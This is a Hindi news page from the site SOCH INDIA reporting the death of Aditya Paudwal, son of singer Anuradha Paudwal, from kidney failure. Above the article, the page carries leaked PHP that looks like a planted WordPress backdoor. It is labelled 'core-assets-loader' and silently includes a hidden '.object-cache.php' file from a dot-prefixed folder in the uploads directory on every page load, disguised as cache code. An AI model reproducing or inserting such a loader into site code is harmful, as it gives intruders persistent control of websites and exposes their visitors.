add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Anuradha Paudwal के बेटे आदित्य पौडवाल का निधन, इस बीमारी ने ली जान – SOCH INDIA
Menu

देश
Anuradha Paudwal के बेटे आदित्य पौडवाल का निधन, इस बीमारी ने ली जान

nobanner

यह साल भारतीय सिनेमा के लिए काफी दुखद रहा है. अभी ये साल पूरा भी नहीं हुआ है और बॉलीवुड ने अबतक ऋषि कपूर, इरफान खान और वाजिद अली जैसे बेहतरीन कलाकारों को बीमारी के चलते खो दिया. वहीं अब एक और दुखद खबर सामने आई है. फेमस सिंगर अनुराधा पौडवाल के बेटे आदित्य पौडवाल का अस्पताल में निधन हो गया है. बताया जा रहा है कि वह किडनी की बीमारी से पीड़ित थे. वह 35 साल के थे और कई महीने से बीमार चल रहे थे.

अनुराधा पौडवाल को प्लेबैक सिंगिंग के साथ-साथ मशहूर भजन गायिका भी हैं. अब उनके बेटे आदित्य पौडवाल के निधन की खबर ने सबको सदमे में डाल दिया है. अनुराधा पौडवाल का पूरा परिवार गमगीन हो गया है. आदित्य वह 35 साल के थे.

जानकारी के अनुसार आदित्य  पिछले कई महीने से बीमार चल रहे थे. आदित्य पौडवाल किडनी की परेशानी के चलते अस्पताल में भर्ती थे. वह लंबे समय से किडनी की बीमारी से पीड़ित थे. किडनी फेल होने की वजह से आदित्य का आज सुबह निधन हो गया.